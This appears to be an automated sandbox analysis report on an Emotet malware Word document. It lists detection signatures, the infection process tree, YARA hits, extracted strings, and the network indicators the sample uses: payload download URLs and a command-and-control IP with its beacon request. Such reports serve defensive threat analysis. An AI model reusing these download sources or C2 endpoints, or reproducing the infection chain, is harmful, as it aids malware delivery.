
Analysis Report SecuriteInfo.com.Exploit.Siggen2.13241.24099.28027

Overview

General Information

Sample Name:SecuriteInfo.com.Exploit.Siggen2.13241.24099.28027 (renamed file extension from 28027 to doc)
Analysis ID:255747
MD5:e195f36b206d00392513fa478017b164
SHA1:a0e0048e3387b1ca5c4dfc6175d4958ab5157557
SHA256:cb62bca74d99cf663f017a96fe335ed6f7b61dc98c84b17b65184293ed02e223

Most interesting Screenshot:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious encrypted Powershell command line found
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Emotet
Yara detected Emotet Downloader
Creates processes via WMI
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Document contains an embedded VBA with hexadecimal encoded strings
Document contains an embedded VBA with many randomly named variables
Drops PE files to the user root directory
Drops executables to the windows directory (C:\Windows) and starts them
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
PowerShell case anomaly found
Powershell drops PE file
Very long command line found
Allocates a big amount of memory (probably used for heap spraying)
Contains capabilities to detect virtual machines
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • WINWORD.EXE (PID: 6896 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
  • powershell.exe (PID: 6992 cmdline: powersheLL -e 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 MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 7000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 7128 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • 849.exe (PID: 5056 cmdline: C:\Users\user\849.exe MD5: 4B065D0A3A17C2F31D40A23E996A6ECD)
    • tokenbinding.exe (PID: 4564 cmdline: C:\Windows\SysWOW64\waitfor\tokenbinding.exe MD5: 4B065D0A3A17C2F31D40A23E996A6ECD)
  • svchost.exe (PID: 5732 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5880 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5164 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source: C:\Users\user\Documents\20200802\PowerShell_transcript.302494.LZD4tBHE.20200802005408.txt
Rule: PowerShell_Case_Anomaly
Description: Detects obfuscated PowerShell hacktools
Author: Florian Roth
Strings:
  • 0x23:$s1: PowerShell
  • 0xff:$s1: powersheLL
  • 0xfe7:$s1: PowerShell
  • 0x23:$sr1: PowerShell
  • 0xfe7:$sr1: PowerShell
  • 0x23:$sn3: PowerShell
  • 0xfe7:$sn3: PowerShell
  • 0x101:$a1: wersheLL -e

Source: C:\Users\user\Documents\20200802\PowerShell_transcript.302494.LZD4tBHE.20200802005408.txt
Rule: JoeSecurity_EmotetDownloader
Description: Yara detected Emotet Downloader
Author: Joe Security

Memory Dumps

Source: 00000004.00000002.1287838829.0000000002151000.00000020.00000001.sdmp
Rule: JoeSecurity_Emotet
Description: Yara detected Emotet
Author: Joe Security

Source: 00000005.00000002.1540004718.0000000002280000.00000040.00000001.sdmp
Rule: JoeSecurity_Emotet
Description: Yara detected Emotet
Author: Joe Security

Source: 00000004.00000002.1287828307.0000000002140000.00000040.00000001.sdmp
Rule: JoeSecurity_Emotet
Description: Yara detected Emotet
Author: Joe Security

Source: 00000005.00000002.1540365127.00000000022A1000.00000020.00000001.sdmp
Rule: JoeSecurity_Emotet
Description: Yara detected Emotet
Author: Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Source: C:\Windows\SysWOW64\waitfor\tokenbinding.exe | Code function: 5_2_022A1D9C CryptDecodeObjectEx,5_2_022A1D9C
Source: C:\Users\user\849.exe | Code function: 4_2_00401078 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,4_2_00401078
Source: C:\Users\user\849.exe | Code function: 4_2_00444717 lstrlenA,FindFirstFileA,FindClose,4_2_00444717
Source: C:\Users\user\849.exe | Code function: 4_2_004028E0 FindFirstFileA,FindClose,4_2_004028E0
Source: C:\Users\user\849.exe | Code function: 4_2_004390BA __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,4_2_004390BA
Source: C:\Windows\SysWOW64\waitfor\tokenbinding.exe | Code function: 5_2_00401078 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,5_2_00401078
Source: C:\Windows\SysWOW64\waitfor\tokenbinding.exe | Code function: 5_2_00444717 lstrlenA,FindFirstFileA,FindClose,5_2_00444717
Source: C:\Windows\SysWOW64\waitfor\tokenbinding.exe | Code function: 5_2_004047C0 FindFirstFileA,FindNextFileA,FindClose,5_2_004047C0
Source: C:\Windows\SysWOW64\waitfor\tokenbinding.exe | Code function: 5_2_004028E0 FindFirstFileA,FindClose,5_2_004028E0
Source: C:\Windows\SysWOW64\waitfor\tokenbinding.exe | Code function: 5_2_004390BA __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,5_2_004390BA
Source: C:\Windows\SysWOW64\waitfor\tokenbinding.exe | Code function: 5_2_022A28BC FindNextFileW,FindFirstFileW,FindClose,5_2_022A28BC
Source: winword.exe | Memory has grown: Private usage: 5MB later: 65MB
Source: global traffic | DNS query: name: nwcsvcs.com
Source: global traffic | TCP traffic: 192.168.2.5:49737 -> 142.105.151.124:443
Source: global traffic | TCP traffic: 192.168.2.5:49730 -> 23.235.202.92:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2404306 ET CNC Feodo Tracker Reported CnC Server TCP group 4 192.168.2.5:49737 -> 142.105.151.124:443
Source: global traffic | HTTP traffic detected:
  GET /cgi-bin/uz6_qs8_qr/ HTTP/1.1
  Host: nwcsvcs.com
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  POST /DOVlgd/eHsHYbceyRSLyxnn/NZsywcmW1rRBnISBB/OcOwXx/y0VWVY/ HTTP/1.1
  Referer: http://142.105.151.124/DOVlgd/eHsHYbceyRSLyxnn/NZsywcmW1rRBnISBB/OcOwXx/y0VWVY/
  Content-Type: multipart/form-data; boundary=---------------------------998821721308771
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 142.105.151.124:443
  Content-Length: 4612
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: unknown | TCP traffic detected without corresponding DNS query: 142.105.151.124 (reported 6 times)
Source: global traffic | HTTP traffic detected:
  GET /cgi-bin/uz6_qs8_qr/ HTTP/1.1
  Host: nwcsvcs.com
  Connection: Keep-Alive
Source: unknown | DNS traffic detected: queries for: nwcsvcs.com
Source: unknown | HTTP traffic detected:
  POST /DOVlgd/eHsHYbceyRSLyxnn/NZsywcmW1rRBnISBB/OcOwXx/y0VWVY/ HTTP/1.1
  Referer: http://142.105.151.124/DOVlgd/eHsHYbceyRSLyxnn/NZsywcmW1rRBnISBB/OcOwXx/y0VWVY/
  Content-Type: multipart/form-data; boundary=---------------------------998821721308771
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 142.105.151.124:443
  Content-Length: 4612
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: PowerShell_transcript.302494.LZD4tBHE.20200802005408.txt.1.dr | String found in binary or memory: http://nwcsvcs.com/cgi-bin/uz6_qs8_qr/
Source: PowerShell_transcript.302494.LZD4tBHE.20200802005408.txt.1.dr | String found in binary or memory: http://odessaresources.com/cgi-bin/3_o_but9/
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: PowerShell_transcript.302494.LZD4tBHE.20200802005408.txt.1.dr | String found in binary or memory: http://onewithyoucd.com/_mm/oix_ktcpc_dljhsex/
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: PowerShell_transcript.302494.LZD4tBHE.20200802005408.txt.1.dr | String found in binary or memory: http://www.piemonteitinera.net/n_g2o4_jumkt4/
Source: svchost.exe, 00000003.00000002.1538719097.000001EF8E23E000.00000004.00000001.sdmp | String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000003.00000002.1538719097.000001EF8E23E000.00000004.00000001.sdmp | String found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 00000003.00000002.1538719097.000001EF8E23E000.00000004.00000001.sdmp | String found in binary or memory: https://activity.windows.com
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://api.aadrm.com/
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://api.diagnostics.office.com
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://api.diagnosticssdf.office.com
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://api.microsoftstream.com/api/
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://api.onedrive.com
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://apis.live.net/v5.0/
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://app.powerbi.com/taskpane.html
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://augloop.office.com
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: svchost.exe, 00000003.00000002.1538719097.000001EF8E23E000.00000004.00000001.sdmp | String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://cdn.entity.
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://clients.config.office.net/
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: svchost.exe, 00000003.00000002.1538719097.000001EF8E23E000.00000004.00000001.sdmp | String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://config.edge.skype.com
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://cortana.ai
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://cr.office.com
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://dataservice.o365filtering.com
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://dataservice.o365filtering.com/
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://devnull.onenote.com
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://directory.services.
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://entitlement.diagnostics.office.com
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://graph.ppe.windows.net
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://graph.ppe.windows.net/
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://graph.windows.net
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://graph.windows.net/
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://incidents.diagnostics.office.com
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://lifecycle.office.com
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://login.microsoftonline.com/
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://login.microsoftonline.com/common
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://login.windows.local
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://management.azure.com
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://management.azure.com/
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://messaging.office.com/
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://ncus-000.contentsync.
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://ncus-000.pagecontentsync.
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://officeapps.live.com
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://onedrive.live.com
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://onedrive.live.com/embed?
Source: PowerShell_transcript.302494.LZD4tBHE.20200802005408.txt.1.dr | String found in binary or memory: https://onefarmdesign.com/cgi-bin/u_fig_m2mv/
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://powerlift.acompli.net
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://retailer.osi.office.net/appstate/query
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://settings.outlook.com
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://shell.suite.office.com:1443
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://skyapi.live.net/Activity/
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://store.office.cn/addinstemplate
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://store.office.com/addinstemplate
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://store.office.de/addinstemplate
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://tasks.office.com
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://templatelogging.office.com/client/log
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://web.microsoftstream.com/video/
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.dr | String found in binary or memory: https://wus2-000.contentsync.
